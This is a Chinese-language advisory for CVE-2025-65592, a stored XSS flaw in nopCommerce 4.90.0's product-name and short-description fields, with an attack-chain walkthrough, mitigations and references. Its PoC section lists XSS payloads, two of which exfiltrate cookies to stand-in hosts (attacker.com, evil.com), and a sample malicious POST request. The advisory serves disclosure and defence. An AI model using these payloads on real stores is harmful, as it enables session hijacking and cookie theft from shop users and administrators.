CVE-2025-65592 nopCommerce产品管理存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-65592

漏洞类型

XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

nopCommerce 4.90.0

漏洞概述

CVE-2025-65592是存在于nopCommerce 4.90.0版本中的一个存储型跨站脚本攻击（Stored XSS）漏洞。该漏洞位于产品管理功能模块，攻击者可以在创建或编辑产品时，在「产品名称」（Product Name）和「简短描述」（Short Description）字段中注入恶意JavaScript脚本代码。由于应用程序缺乏对用户输入的有效过滤和转义，这些恶意载荷会被直接存储到后端数据库中。当其他用户访问受影响的页面时，存储的恶意脚本会自动执行，可能导致会话劫持、Cookie窃取、钓鱼攻击或恶意内容传播。由于该漏洞为存储型XSS，攻击载荷具有持久性，一旦注入成功，所有访问相关页面的用户都将受到威胁。此漏洞的利用需要攻击者具有产品管理功能的访问权限，但不需要高权限，普通用户即可实施攻击。

技术细节

该漏洞属于存储型XSS（Stored Cross-Site Scripting）漏洞，攻击向量为Web应用输入验证不足。在nopCommerce 4.90.0的产品管理模块中，当管理员或具有产品编辑权限的用户在「产品名称」和「简短描述」字段中输入内容时，应用程序未对特殊字符进行适当的HTML实体编码或输入过滤。攻击者可以构造包含JavaScript代码的恶意载荷，例如：<script>alert(document.cookie)</script>或<img src=x onerror=恶意代码>。这些载荷被保存到数据库后，在后续页面渲染时未经转义直接输出到HTML中。当受害者（管理员或其他用户）访问产品列表或详情页面时，浏览器会将其解析为可执行脚本。攻击者可利用此漏洞窃取用户会话令牌、劫持账户、修改页面内容或进行进一步的社会工程攻击。由于攻击者可以控制产品信息，任何查看相关产品的用户都将成为潜在受害者。

攻击链分析

STEP 1

步骤1

攻击者登录nopCommerce后台管理系统，获取产品管理功能的访问权限

STEP 2

步骤2

导航至产品创建或编辑页面，准备注入恶意代码

STEP 3

步骤3

在「产品名称」（Product Name）或「简短描述」（Short Description）字段中输入XSS恶意载荷，如<script>alert(document.cookie)</script>

STEP 4

步骤4

提交表单，恶意载荷被存储到后端数据库中，未经过滤或转义处理

STEP 5

步骤5

当其他用户（管理员或其他用户）访问产品列表或产品详情页面时，页面渲染从数据库读取的未转义内容

STEP 6

步骤6

用户浏览器将页面中的恶意脚本解析为可执行代码，攻击者的JavaScript代码在受害者浏览器上下文中执行

STEP 7

步骤7

攻击者通过执行脚本窃取用户Cookie、会话令牌或其他敏感信息，进而实现账户劫持或其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-65592 PoC - Stored XSS in nopCommerce Product Management
// Target: nopCommerce 4.90.0
// Attack Vector: Product Name or Short Description fields

// Step 1: Identify the product creation/editing endpoint
// Typically: /Admin/Product/Create or /Admin/Product/Edit/{productId}

// Step 2: Inject XSS payload in Product Name field
const xssPayload1 = '<script>console.log(document.cookie)</script>';

// Alternative payload using img tag
const xssPayload2 = '<img src=x onerror="fetch(\"https://attacker.com/steal?c=\"+document.cookie)\\>">';

// Alternative payload using SVG element
const xssPayload3 = '<svg onload="eval(atob(\"YWxlcnQoZG9jdW1lbnQuY29va2llKQ==\"))">';

// Step 3: Inject XSS payload in Short Description field
const xssPayload4 = '<iframe src="javascript:alert(document.domain)">';

// Example HTTP POST request (simplified)
/*
POST /Admin/Product/Save HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

Name=<script>alert(document.cookie)</script>&ShortDescription=<img src=x onerror=fetch('https://evil.com/?c='+document.cookie)>&
*/

// Step 4: When any user views the affected product page, the XSS will execute automatically

影响范围

nopCommerce 4.90.0

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）严格限制产品管理功能的访问权限，仅允许受信任的管理员账户操作；2）在前端和后端同时实施输入验证，对<、>、"、'、script等特殊字符进行过滤或转义；3）启用浏览器的X-XSS-Protection响应头；4）配置严格的Content-Security-Policy策略限制脚本执行；5）监控产品管理功能的操作日志，及时发现异常行为；6）对现有产品数据进行安全扫描，清理可能存在的恶意载荷。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-65592
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-65592
3 Details https://www.cvedetails.com/cve/CVE-2025-65592/
4 VulDB https://vuldb.com/cve/CVE-2025-65592
5 Link https://seclists.org/fulldisclosure/2025/Dec/19
6 Link https://www.nopcommerce.com/
7 Link http://seclists.org/fulldisclosure/2025/Dec/19